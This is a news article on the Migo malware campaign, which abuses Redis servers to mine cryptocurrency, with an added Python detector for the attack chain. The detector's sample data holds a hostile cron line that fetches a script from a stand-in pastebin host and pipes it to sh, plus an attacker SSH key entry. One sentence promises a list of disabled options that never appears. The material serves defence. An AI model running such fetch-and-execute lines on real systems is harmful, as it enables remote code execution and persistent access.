New Migo Malware Targeting Redis Servers for Cryptocurrency Mining

February 20, 2024 | Newsroom | Server Security / Cryptojacking

A new malware campaign has been observed targeting Redis servers for initial access with the ultimate goal of mining cryptocurrency on compromised Linux hosts.

"This particular campaign involves the use of a number of novel system-weakening techniques used against the data store itself," said Matt Muir, security researcher at Cado, in a technical report.

The cryptojacking attack is facilitated by malware codenamed Migo, a Golang ELF binary that comes equipped with compile-time obfuscation and the ability to persist on Linux machines.

The cloud security company said it detected the campaign after identifying an "unusual series of commands" targeting its Redis honeypots that are designed to lower security defenses by disabling the following configuration options:

It is suspected that these options are disabled so that additional commands can be sent to the Redis server from external networks, facilitating later exploitation without attracting much attention.

This step is followed by the threat actors setting up two Redis keys, one pointing to an SSH key controlled by the attacker and the other to a cron task that retrieves the primary malicious payload from a file transfer service called Transfer.sh, a technique previously seen in early 2023.

The shell script that retrieves Migo via Transfer.sh is embedded in a Pastebin file, which is in turn fetched using a curl or wget command.
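As an added illustration of the Redis abuse described above (example code written for this article, not from Cado's report), the following Python detector parses Redis MONITOR output and flags a client that, in quick succession, switches configuration options off and writes keys whose values look like a cron job fetching from Transfer.sh or Pastebin, or like an SSH public key. The sample lines, hosts, key names, URLs and the configuration option named in them are constructed placeholders.

```python
import re
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

# Constructed sample in Redis MONITOR output format; addresses, key names, URLs and the option name are placeholders.
SAMPLE_MONITOR = """\
1708400000.100000 [0 203.0.113.5:51234] "CONFIG" "SET" "protected-mode" "no"
1708400000.200000 [0 203.0.113.5:51234] "SET" "backup1" "\\n*/1 * * * * root (curl -fsSL https://pastebin.example/raw/PLACEHOLDER || wget -qO- https://pastebin.example/raw/PLACEHOLDER) | sh\\n"
1708400000.300000 [0 203.0.113.5:51234] "SET" "backup2" "\\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCPLACEHOLDER attacker@example\\n"
1708400001.000000 [0 10.0.0.7:40000] "SET" "session:42" "user=alice"
"""

MONITOR_RE = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>[^\]]+)\] (?P<args>.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')  # one double-quoted MONITOR argument
# A crontab entry (five schedule fields) whose command fetches from the services named in the report.
CRON_FETCH_RE = re.compile(r'^\s*[\d*/,-]+(\s+[\d*/,-]+){4}\s+.*\b(curl|wget)\b.*\b(transfer\.sh|pastebin)', re.M | re.I)
SSH_KEY_RE = re.compile(r'\bssh-(rsa|ed25519|dss)\s+[A-Za-z0-9+/=]{20,}')

def parse_line(line: str) -> Optional[Tuple[float, str, List[str]]]:
    """Split one MONITOR line into (timestamp, client, argv), unescaping \\n, \\r and \\" in values."""
    m = MONITOR_RE.match(line)
    if not m:
        return None
    args = [a.replace('\\n', '\n').replace('\\r', '\r').replace('\\"', '"') for a in ARG_RE.findall(m['args'])]
    return float(m['ts']), m['client'], args

def classify(args: List[str]) -> Optional[str]:
    """Tag a single command when it looks like one step of the chain described above."""
    if len(args) >= 4 and [a.upper() for a in args[:2]] == ['CONFIG', 'SET'] and args[3].lower() in ('no', '0', ''):
        return 'config-weakening'      # a configuration option being switched off
    if len(args) >= 3 and args[0].upper() in ('SET', 'SETEX', 'APPEND'):
        if CRON_FETCH_RE.search(args[2]):
            return 'cron-dropper-key'  # key value shaped like a cron job that pulls a payload
        if SSH_KEY_RE.search(args[2]):
            return 'ssh-key-in-value'  # key value carrying an SSH public key
    return None

def detect(monitor_text: str, window: float = 60.0) -> Dict[str, List[str]]:
    """Alert on each client that issued two or more distinct suspicious steps within `window` seconds."""
    per_client = defaultdict(list)
    for ts, client, args in filter(None, map(parse_line, monitor_text.splitlines())):
        tag = classify(args)
        if tag:
            per_client[client].append((ts, tag))
    alerts: Dict[str, List[str]] = {}
    for client, events in per_client.items():
        tags = sorted({tag for _, tag in events})
        if len(tags) >= 2 and max(t for t, _ in events) - min(t for t, _ in events) <= window:
            alerts[client] = tags
    return alerts
```

Running `detect(SAMPLE_MONITOR)` reports the first client with all three tags, while the second client's ordinary SET is ignored.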


The Go-based ELF binary, in addition to incorporating mechanisms to resist reverse engineering, acts as a downloader for an XMRig installer hosted on GitHub. It is also responsible for performing a series of steps to establish persistence, remove competing miners, and launch the miner.

On top of that, Migo disables Security-Enhanced Linux (SELinux) and looks for uninstall scripts for the monitoring agents bundled with compute instances from cloud providers such as Qcloud and Alibaba Cloud. Additionally, it deploys a modified version ("libsystemd.so") of a popular user-mode rootkit called libprocesshider to hide processes and artifacts on disk.

It's worth noting that these actions overlap with tactics adopted by well-known cryptojacking groups like TeamTNT, WatchDog, Rocke, and threat actors associated with the SkidMap malware.


"Interestingly, Migo appears to recursively iterate through files and directories under /etc," Muir noted. "The malware will simply read the files in these locations and do nothing with the content."

"One theory is that this could be a (weak) attempt to confuse the sandbox and dynamic analysis solutions by performing a large number of benign actions, resulting in a non-malicious classification."

Another hypothesis is that the malware is looking for a specific artifact in the target environment, although Cado said it found no evidence to support this line of reasoning.

"Migo demonstrates that cloud-focused attackers continue to refine their techniques and improve their ability to exploit web services," Muir said.

"Although libprocesshider is frequently used in cryptojacking campaigns, this particular variant includes the ability to hide artifacts on disk in addition to the malicious processes themselves."
